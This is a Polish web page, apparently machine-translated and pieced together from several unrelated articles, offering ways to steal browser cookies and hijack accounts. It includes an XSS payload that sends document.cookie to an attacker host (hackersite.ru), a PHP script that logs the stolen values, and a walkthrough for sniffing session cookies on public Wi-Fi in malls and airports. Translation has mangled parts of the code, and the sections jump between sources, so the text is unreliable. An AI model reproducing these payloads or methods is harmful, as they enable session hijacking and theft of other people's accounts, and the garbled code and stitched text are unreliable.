Komputery ze współczesnym światem

Łatwy sposób na kradzież plików cookie. Sposoby kradzieży plików cookie Pobierz program do kradzieży plików cookie

Co to jest plik cookie?

Istnieje mechanizm, który pozwala serwerowi http przechowywać niektóre informacje tekstowe, a następnie skontaktuj się z nią. Ta informacja zwane ciasteczkiem. Zasadniczo każdy plik cookie to para: nazwa parametru i jego wartość. Każdemu ciasteczkowi przypisana jest także domena, do której należy. Ze względów bezpieczeństwa we wszystkich przeglądarkach serwer http może uzyskać dostęp tylko do plików cookie swojej domeny. Dodatkowo pliki cookies mogą mieć datę ważności i w takim przypadku będą przechowywane na komputerze do tego czasu, nawet jeśli zamkniesz wszystkie okna przeglądarki.


Dlaczego pliki cookie są ważne?

Wszystkie systemy wielodostępne wykorzystują pliki cookie do identyfikacji użytkownika. Dokładniej, aktualne połączenie użytkownika z usługą, sesja użytkownika. Jeśli ktoś rozpozna Twoje pliki cookies, będzie mógł zalogować się do systemu w Twoim imieniu. Ponieważ obecnie bardzo niewiele zasobów Internetu sprawdza zmiany adresu IP podczas jednej sesji użytkownika.


Jak zmienić lub zastąpić pliki cookies?

Twórcy przeglądarek nie udostępniają wbudowanych narzędzi do edycji plików cookies. Ale możesz sobie poradzić ze zwykłym notatnikiem.


Krok 1: utwórz plik tekstowy z tekstem

Edytor rejestru systemu Windows wersja 5.00



@="C:\\IE_ext.htm"

Zapisz go pod nazwą IE_ext.reg

Krok 2: Korzystając z utworzonego pliku, dodaj zmiany do rejestru Windows.

Krok 3: utwórz plik tekstowy z tekstem

< script język="javascript">
external.menuArguments.clipboardData.setData("Tekst" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= „nazwa testowa=wartość testowa; ścieżka=/; domena=domena testowa.ru”;
alert(external.menuArguments.document.cookie);


Zapisz go pod nazwą C:\IE_ext.htm

Krok 4: Wchodzimy na interesującą nas stronę internetową.

Krok 5: Kliknij prawym przyciskiem myszy wolna przestrzeń stronę i wybierz element menu „Praca z plikami cookie”. Zezwól na dostęp do schowka. Twoje pliki cookie z tej witryny zostaną zapisane w schowku. Możesz włożyć ich notatnik i zajrzeć.


Krok 6: Aby zmienić niektóre pliki cookie, edytuj plik C:\IE_ext.htm, zastępując go Nazwa testu w imię ciasteczka, wartość testowa- o jego znaczeniu, domena testowa.ru– do domeny serwisu. Jeśli to konieczne, dodaj więcej podobnych linii. Dla ułatwienia kontroli dodałem do skryptu dane wyjściowe bieżących plików cookie przed i po zmianie: alert(external.menuArguments.document.cookie);

Krok 7: Wykonaj ponownie krok 5, a następnie odśwież stronę.

Konkluzja: będziemy uzyskiwać dostęp do tego zasobu internetowego za pomocą zaktualizowanych plików cookie.

Jak ukraść pliki cookie za pomocą JavaScript?

Jeśli atakującemu uda się znaleźć możliwość wykonania dowolnego skryptu JavaScript na komputerze ofiary, może on z łatwością odczytać aktualne pliki cookie. Przykład:


var str= dokument.cookie;

Tylko czy uda mu się przenieść je na swoją stronę, bo tak jak wspomniałem wcześniej, skrypt JavaScript nie będzie mógł bez dodatkowego potwierdzenia uzyskać dostępu do strony znajdującej się w innej domenie? Okazuje się, że skrypt JavaScript może załadować dowolny obraz znajdujący się na dowolnym serwerze http. Jednocześnie przenieś na to zdjęcie wszelkie informacje tekstowe zawarte w żądaniu pobrania. Przykład: http://hackersite.ru/xss.jpg?text_info Jeśli więc uruchomisz ten kod:

var img= nowy wygląd();

img.src= „http://hackersite.ru/xss.jpg?”+ encodeURI(document.cookie);


wówczas plik cookie zakończy się żądaniem pobrania „zdjęcia” i „trafi” do atakującego.

Jak sobie poradzić z takimi prośbami o pobranie „obrazu”?

Osoba atakująca musi jedynie znaleźć hosting z obsługą PHP i umieścić tam taki kod:

$uid=kod url($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Następnie wszystkie parametry żądania dla tego skryptu zostaną zapisane w pliku log.txt. Pozostaje jedynie zastąpić opisany wcześniej skrypt JavaScript http://hackersite.ru/xss.jpg do ścieżki do tego skryptu php.


Konkluzja

Pokazałem jedynie najprostszy sposób wykorzystania luk XSS. Dowodzi to jednak, że obecność co najmniej jednej takiej luki w witrynie internetowej przeznaczonej dla wielu użytkowników może pozwolić osobie atakującej na wykorzystanie jej zasobów w Twoim imieniu.

Witam, ten krótki artykuł, a raczej krótki opis, chciałbym zadedykować sobie prosta droga przechwytywać pliki cookie sieci Wi-Fi. Nie będę Ci tu mówić, czym są pliki cookie i do czego są potrzebne, jeśli ktoś jest zainteresowany przechwytywaniem „wypieków”; w sieci bezprzewodowej, myślę, że powinien wiedzieć, co to jest i dlaczego tego potrzebuje. Powiem tylko jedno: za pomocą tych plików możesz uzyskać dostęp do kont innych osób w różnych witrynach, które wymagają od użytkowników przejścia procesu uwierzytelniania (na przykład mail.ru, vkontakte.ru itp.).

Więc zacznijmy. Najpierw musimy znaleźć samą sieć bezprzewodową z otwartą bramą dostępu do Internetu, a pożądane jest, aby sieć ta miała dość dużą liczbę klientów. Na przykład odpowiednia jest każda sieć w dużych centrach handlowych, na lotniskach, w różnych kawiarniach, w takich miejscach ludzie zwykle korzystają dostęp do Wi-Fi w Internecie, do czytania poczty, sprawdzania kont na różnych portalach randkowych, przeglądania LJ i różnych forów. To wszystko jest dokładnie tym, czego potrzebujemy. Decydując się na wybór lokalizacji sieci, po przestudiowaniu określonych godzin maksymalnej liczby klientów, przejdźmy bezpośrednio do działań bojowych. Do tego potrzebujemy laptopa z adapter Wi-Fi i pewien zestaw programów. W moim przypadku zastosowałem Laptop Acera Zainstalowany Aspire 3610, kliencka karta Wi-Fi D-Link DWL G650 i zainstalowany system operacyjny BackTrack3.

Radzę używać tego systemu operacyjnego, ponieważ zawiera on już cały zestaw programów, których możesz potrzebować, a najważniejszą zaletą jest to, że nie musisz instalować Backtrack na swoim dysk twardy, możesz uruchomić ten system operacyjny bezpośrednio z dysku CD lub dysku flash.

Przejdźmy teraz do niezbędnego oprogramowania. Użyłem kismet do wykrywania sieci, a WifiZoo do przechwytywania plików cookie. Zastanowię się szczegółowo nad drugim programem. WifiZoo to pasywny skaner transmisji, który zbiera sporo przydatnych informacji, takich jak: pop3, ruch smtp, pliki cookie/authinfo http, msn, dane uwierzytelniające FTP, ruch w sieci telnet, nbt itp. Jedyną wadą tego programu jest brak trybu przeskakiwania kanałów, WifiZoo po prostu słucha interfejs bezprzewodowy i nie może, że tak powiem, przeskakiwać z kanału na kanał. Ale tę wadę rekompensuje inny program Kismet, który obsługuje ten tryb. Aby uruchomić WifiZoo będziesz potrzebować:

  • pyton
  • skapujący
  • przeznaczenie

Uruchommy więc program, najpierw uruchommy Kismet, aby obsługiwał tryb przeskakiwania kanałów, a następnie uruchommy bezpośrednio WifiZoo, przed tobą powinno pojawić się następujące okno:

Teraz pozostaje tylko siedzieć i czekać, aż coś przechwycisz; wszystko, co przechwyci program, znajdziesz w logach, które znajdują się w katalogu z programem /logs/. Możesz także uruchomić interfejs GUI, który automatycznie łączy się z http pod adresem 127.0.0.1:8000

Nie będę pisać o wszystkich funkcjach tego wspaniałego programu, myślę, że sam dowiesz się o pozostałych funkcjach, a ponieważ w tej chwili interesują nas tylko pliki cookie. Kliknij link z informacją o plikach cookie i zobacz, co przechwyciliśmy:

Czy zastanawiałeś się kiedyś, w jaki sposób niektóre witryny internetowe personalizują swoich gości? Można to wyrazić na przykład w zapamiętywaniu zawartości „koszyka” (jeśli węzeł ten przeznaczony jest do sprzedaży towarów) lub w sposobie wypełniania pól jakiegoś formularza. Protokół HTTP, na którym opiera się funkcjonowanie sieci WWW, nie ma możliwości śledzenia zdarzeń od jednej wizyty do kolejnej witryny, dlatego opracowano specjalny dodatek umożliwiający przechowywanie takich „stanów”. Mechanizm ten, opisany w dokumencie RFC 2109, wstawia specjalne fragmenty danych z plików cookie do żądań i odpowiedzi HTTP, co umożliwia witrynom internetowym śledzenie osób odwiedzających.

Dane cookies mogą być przechowywane przez czas trwania sesji komunikacyjnej ( na sesję), pozostając w pamięć o dostępie swobodnym podczas jednej sesji i usuwane po zamknięciu przeglądarki lub nawet po upływie określonego czasu. W pozostałych przypadkach są one trwałe ( uporczywy), pozostając na dysku twardym użytkownika jako plik tekstowy. Zazwyczaj są one przechowywane w katalogu Cookies (%windir%\Cookies w systemie Win9x i %userprofile%\Cookies w systemie NT/2000). Nie trudno się domyślić, że po przechwyceniu plików cookies w Internecie osoba atakująca może podszyć się pod użytkownika tego komputera lub zebrać treści zawarte w tych plikach. ważna informacja. Po przeczytaniu poniższych sekcji zrozumiesz, jak łatwo to zrobić.

Przechwytywanie plików cookie

Najbardziej bezpośrednią metodą jest przechwytywanie plików cookie przesyłanych przez sieć. Przechwycone dane można następnie wykorzystać podczas logowania do odpowiedniego serwera. Ten problem można rozwiązać za pomocą dowolnego narzędzia do przechwytywania pakietów, ale jednym z najlepszych jest program Lavrenty'ego Nikuli ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet zawiera dwa narzędzia, które współpracują ze sobą. Program Przechwytywanie sieci przechwytuje sam pakiet i zapisuje go na dysku, a narzędzie PeepNet otwiera plik i konwertuje go do formatu czytelnego dla człowieka. Poniższy przykład to fragment sesji komunikacyjnej odtworzonej przez PeepNet, podczas której plik cookie służy do uwierzytelniania i kontroli dostępu do przeglądanych stron (imiona zostały zmienione w celu zachowania anonimowości).

POBIERZ http://www.victim.net/images/logo.gif HTTP/1.0 Zaakceptuj: */* Strona odsyłająca: http://www.victim.net/ Host: www.victim.net Plik cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

Powyższy przykład pokazuje fragment pliku cookie umieszczony w żądaniu HTTP przychodzącym do serwera. Najważniejsze jest pole cuid=, który określa unikalny identyfikator używany do uwierzytelniania użytkownika w węźle www.victim.net. Załóżmy, że po tym atakujący odwiedził węzeł ofiary.net, otrzymał własny identyfikator i plik cookie (przy założeniu, że węzeł nie umieszcza danych z pliku cookie w pamięci wirtualnej, ale zapisuje je na dysku twardym). Osoba atakująca może następnie otworzyć swój własny plik cookie i zastąpić nim identyfikator pola cuid= z przechwyconego pakietu. W takim wypadku logując się do serwera ofiar.net będzie on postrzegany jako użytkownik, którego dane cookies zostały przechwycone.

Możliwość programu PeepNet odtworzenie całej sesji komunikacyjnej lub jej fragmentu znacznie ułatwia realizację tego typu ataków. Za pomocą przycisku Idź weź to! Możesz ponownie pobrać strony przeglądane przez użytkownika, korzystając z jego danych cookie przechwyconych wcześniej przez CaptureNet. W oknie dialogowym narzędzia PeepNet możesz zobaczyć informacje o zrealizowanych zamówieniach. Wykorzystuje dane cookie przechwycone przez CaptureNet do uwierzytelnienia. Zwróć uwagę na ramkę znajdującą się w prawym dolnym rogu okna dialogowego danych sesji i linię znajdującą się po linii Cookie:. Są to dane cookie wykorzystywane do uwierzytelniania.

To całkiem niezła sztuczka. Ponadto użyteczność Przechwytywanie sieci może zapewnić kompletny odszyfrowany zapis ruchu, co jest prawie równoważne możliwościom profesjonalnych narzędzi, takich jak Sniffer Pro firmy Network Associates, Inc. Jednak użyteczność Sieć szpiegowska Co więcej – możesz otrzymać to za darmo!

Środki zaradcze

Powinieneś uważać na węzły, w których ciasteczka wykorzystywane do uwierzytelniania i przechowywania wrażliwych danych identyfikacyjnych. Jednym z narzędzi, które może pomóc w zapewnieniu bezpieczeństwa, jest plik Cookie Pal firmy Kookaburra Software, który można znaleźć pod adresem http://www.kburra.com/cpal.html. Ten oprogramowanie Można go skonfigurować tak, aby generował komunikaty ostrzegawcze dla użytkownika, gdy witryna internetowa będzie próbowała skorzystać z mechanizmu cookies. W takim przypadku możesz „zajrzeć za kulisy” i zdecydować, czy te działania powinny być dozwolone. W Internet Explorera Istnieje wbudowany mechanizm obsługi plików cookies. Aby ją włączyć, w Panelu sterowania uruchom aplet Opcje internetowe, przejdź do zakładki Bezpieczeństwo, wybierz element Strefa internetowa, ustaw tryb Poziom niestandardowy, a dla stałych i tymczasowych danych plików cookie ustaw przełącznik na Podpowiedź. Konfiguracja obsługi plików cookies w przeglądarce Netscape odbywa się za pomocą polecenia Edycja › Preferencje › Zaawansowane i ustawienie opcji Ostrzegaj przed akceptacją plików cookie lub Wyłącz tryb plików cookie (rys. 16.3). Akceptując plik cookie, należy sprawdzić, czy jest on zapisany na dysku i sprawdzić, czy witryna zbiera informacje o użytkownikach.

Odwiedzając witrynę korzystającą z plików cookie do uwierzytelniania, musisz upewnić się, że nazwa użytkownika i hasło, które początkowo podałeś, są szyfrowane co najmniej SSL. Wtedy informacja ta pojawi się w oknie programu PeepNet, przynajmniej nie w formie zwykłego tekstu.

Autorzy woleliby całkowicie uniknąć plików cookie, gdyby wiele często odwiedzanych witryn internetowych nie wymagało tej opcji. Na przykład w przypadku popularnej na całym świecie usługi Hotmail firmy Microsoft do rejestracji wymagane są pliki cookie. Ponieważ usługa ta wykorzystuje w procesie uwierzytelniania kilka różnych serwerów, dodanie ich do strefy Zaufanych witryn nie jest takie proste (proces ten opisano w sekcji „Rozsądne korzystanie ze stref bezpieczeństwa: typowe rozwiązanie problemu kontroli Activex”). W takim przypadku pomocne będzie oznaczenie *.hotmail.com. Pliki cookies nie są idealnym rozwiązaniem problemu niekompletności protokołu HTML, jednak alternatywne rozwiązania wydają się jeszcze gorsze (np. dodanie do adresu URL identyfikatora, który może być przechowywany na serwerach proxy). Dopóki nie pojawi się lepszy pomysł, jedyną opcją jest kontrolowanie plików cookie przy użyciu metod wymienionych powyżej.

Przechwytuj pliki cookie za pośrednictwem adresu URL

Wyobraźmy sobie coś strasznego: użytkownicy przeglądarki Internet Explorer klikają specjalnie spreparowane hiperłącza i stają się potencjalnymi ofiarami, ryzykując przechwycenie ich plików cookie. Bennett Haselton ( Bennetta Haseltona) i Jamiego McCarthy'ego ( Jamiego McCarthy’ego) z młodzieżowej organizacji Peacefire, która opowiada się za wolnością komunikacji w Internecie, opublikowała scenariusz, który wciela ten pomysł w życie. Skrypt ten pobiera pliki cookie z komputera klienckiego, gdy użytkownik kliknie łącze zawarte na tej stronie. W rezultacie zawartość pliku cookie staje się dostępna dla operatorów witryn internetowych.

Tę funkcję można wykorzystać do niegodziwych celów, osadzając znaczniki IFRAME w kodzie HTML strony internetowej, wiadomości e-mail w formacie HTML lub poście na grupie dyskusyjnej. Poniższy przykład, dostarczony przez konsultanta ds. bezpieczeństwa Richarda M. Smitha, demonstruje możliwość użycia uchwytów IFRAME za pomocą narzędzia opracowanego przez Peacefire.